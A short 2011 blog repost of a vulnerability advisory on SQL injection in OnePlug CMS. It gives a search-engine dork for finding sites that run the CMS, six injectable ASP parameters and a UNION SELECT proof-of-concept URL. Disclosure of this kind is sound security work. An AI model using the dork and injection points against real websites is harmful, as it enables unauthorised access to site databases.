OnePlug CMS Vulnerable to Multiple SQL Injection ~ Random stuff by yappare

Wednesday, March 16, 2011

OnePlug CMS Vulnerable to Multiple SQL Injection

on March 16, 2011 No comments

Title : OnePlug CMS Vulnerable to Multiple SQL Injection
Vendor : http://www.webpromo-inc.com/
Found by : p0pc0rn
Dork : intext:"Powered by OnePlug CMS"

SQL - Microsoft Access
-------------------------------
Parameters
index.asp?Team_ID=[SQL]
service_info.asp?Service_ID=[SQL]
product_details.asp?Product_ID=[SQL]
product_list.asp?Category_ID=[SQL]
product_info.asp?Product_ID=[SQL]
category_list.asp?Category_ID=[SQL]

more..

POC
---
http://site.com/category_list.asp?Category_ID=1 union select 0 from test.a

thanks,
-p0pc0rn-

Random stuff by yappare

Wednesday, March 16, 2011

OnePlug CMS Vulnerable to Multiple SQL Injection

0 comments:

Text Widget

Popular Posts

Pages

Blog Archive

Recent Posts

Unordered List

Categories